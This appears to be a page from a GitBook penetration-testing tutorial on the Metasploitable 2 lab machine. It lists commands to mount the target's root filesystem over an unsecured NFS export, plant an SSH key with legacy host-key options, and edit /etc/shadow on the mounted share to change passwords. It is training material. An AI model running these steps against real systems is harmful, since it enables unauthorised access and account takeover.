RPC Penetration Testing
HomeLearnHackMonitor
  • Welcome!
  • The Protocol
    • Page 2
    • Network File System (NFS)
  • Metasploitable 2
    • Description
  • Remote Enumerate
    • Page 1
  • Attacks
    • Mount Remote Share
Powered by GitBook
On this page
  • Send a new SSH Key
  • Change user password

Was this helpful?

  1. Attacks

Mount Remote Share

PreviousPage 1

Last updated 2 years ago

Was this helpful?

su -
mkdir /media/pen
mount -o nolock -t nfs 192.168.8.117:/ /media/pen
cd /media/pen
ls -la

Send a new SSH Key

ssh-keygen -t rsa -b 4096

Find

ssh -oHostKeyAlgorithms=+ssh-dss user@192.168.8.117 -i meta_key.pub

No password to authenticate?

Change user password

nano /media/pen/etc/shadow